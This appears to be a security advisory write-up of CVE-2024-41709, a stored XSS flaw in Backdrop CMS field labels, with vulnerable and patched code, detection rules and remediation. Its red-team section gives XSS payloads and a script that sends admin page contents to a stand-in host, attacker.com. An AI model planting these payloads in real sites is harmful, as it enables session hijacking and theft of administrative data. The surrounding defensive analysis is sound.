CVE-2024-41709
Executive Summary
CVE-2024-41709 is a stored cross-site scripting (XSS) vulnerability in Backdrop CMS, a Drupal fork. The flaw resides in the insufficient sanitization of field labels before they are displayed in certain administrative interfaces. An attacker with the "administer fields" permission can inject arbitrary JavaScript or HTML into field labels, which will then execute in the browsers of other administrators viewing those fields. While the CVSS score is low due to the high privileges required, the impact is significant in multi-tenant or collaborative environments where field administration is delegated. The vulnerability affects all versions prior to 1.27.3 and 1.28.x prior to 1.28.2.

Supply Chain & Package Security
This vulnerability is not related to a package manager (NPM, PyPI, Go, Ruby) but is a core CMS issue. Administrators should verify the integrity of their Backdrop installation by comparing file hashes against the official release.
CVSS Breakdown & Threat Level
- CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:N
- Base Score: 4.5 (Medium)
- Attack Vector: Network (AV:N)
- Attack Complexity: Low (AC:L)
- Privileges Required: High (PR:H) – requires "administer fields" permission
- User Interaction: Required (UI:R) – victim must view the malicious field
- Scope: Unchanged (S:U)
- Confidentiality Impact: Low (C:L) – potential to steal session cookies or CSRF tokens
- Integrity Impact: Low (I:L) – can modify page content or perform actions on behalf of the victim
- Availability Impact: None (A:N)
Threat Level: Medium. The high privilege requirement reduces the attack surface, but the impact on administrative integrity is significant.
Deep Dive & Mechanics
The vulnerability exists in the field label rendering process. Backdrop CMS uses a theme function to display field labels in administrative pages (e.g., content type management, field configuration). The check_plain() function is used for sanitization, but it is not applied consistently in all contexts. Specifically, when field labels are displayed in certain administrative tables or forms, the raw label value is output without proper HTML escaping.
An attacker with the "administer fields" permission can create or edit a field and set its label to a malicious payload, such as:
<script>alert(document.cookie)</script>
When another administrator visits a page that lists or configures fields, the payload executes in their browser. This can lead to session hijacking, privilege escalation, or defacement of the administrative interface.
The vulnerability is mitigated by the fact that the attacker must already have elevated privileges. However, in environments where field administration is delegated to non-trusted users (e.g., content editors with limited permissions), this becomes a serious risk.
Vulnerable vs. Patched Code
Vulnerable Code (Backdrop CMS < 1.27.3 / < 1.28.2):
In core/modules/field/field.admin.inc, the field label is rendered without sanitization:
function theme_field_ui_field_table($variables) {
// ...
$rows[] = array(
'data' => array(
// Vulnerable: label is not sanitized
$field['label'],
// ...
),
);
// ...
}
Patched Code (Backdrop CMS 1.27.3 / 1.28.2):
The patched version wraps the label output with check_plain():
function theme_field_ui_field_table($variables) {
// ...
$rows[] = array(
'data' => array(
// Patched: label is sanitized
check_plain($field['label']),
// ...
),
);
// ...
}
Exploitation & Lab Setup
Red Team (Exploitation)
Prerequisites:
- Access to a Backdrop CMS instance with a user account that has the "administer fields" permission.
- A victim administrator who will view the field list page.
Steps:
- Log in as the attacker with field administration privileges.
- Navigate to
admin/structure/types/manage/[content-type]/fields. - Click "Add field" or edit an existing field.
- In the "Label" field, enter the XSS payload:
<img src=x onerror=alert(1)> - Save the field.
- Wait for a victim administrator to visit
admin/structure/types/manage/[content-type]/fields. - The payload executes in the victim's browser.
Advanced Payload (Session Hijacking):
<script>
fetch('/admin/reports/status').then(r=>r.text()).then(t=>{
fetch('https://attacker.com/exfil?data='+btoa(t));
});
</script>
Blue Team (Detection & Hardening)
Detection:
- Monitor for unusual field label content in the
field_configdatabase table. - Look for HTTP requests to
admin/structure/types/manage/*/fieldswith POST data containing HTML tags in thelabelparameter. - Use WAF rules to block field labels containing
<script>,<img onerror>, or other HTML event handlers.
Hardening:
- Restrict the "administer fields" permission to only trusted users.
- Implement Content Security Policy (CSP) headers to mitigate XSS impact.
- Regularly audit field labels for suspicious content.
Indicators of Compromise (IOCs)
Network:
- HTTP POST requests to
/admin/structure/types/manage/*/fieldswithlabelparameter containing HTML tags. - Outbound HTTP requests to attacker-controlled domains from the CMS server.
- HTTP POST requests to
Host:
- Entries in the
field_configdatabase table withlabelcolumn containing<script>or other HTML tags. - Modified files in
core/modules/field/field.admin.inc(if attacker has file write access).
- Entries in the
Logs:
- Web server access logs showing requests to
admin/structure/types/manage/*/fieldsfrom non-admin IPs. - PHP error logs showing unexpected HTML output in field-related pages.
- Web server access logs showing requests to

Remediation & Mitigation
Immediate:
- Upgrade to Backdrop CMS 1.27.3 or 1.28.2.
- If upgrade is not possible, restrict the "administer fields" permission to only super-administrators.
- Implement a WAF rule to block field labels containing HTML tags.
Long-term:
- Conduct a security audit of all custom modules and themes for similar XSS vulnerabilities.
- Implement Content Security Policy (CSP) headers with
script-src 'self'. - Enable automatic security updates for Backdrop CMS.
- Train administrators on the risks of delegating field administration.
Patch Details:
- Upgrade to Backdrop CMS 1.27.3 or 1.28.2.
- No official patch commit is available from OSV/GitHub; the fix is included in the release tarballs.
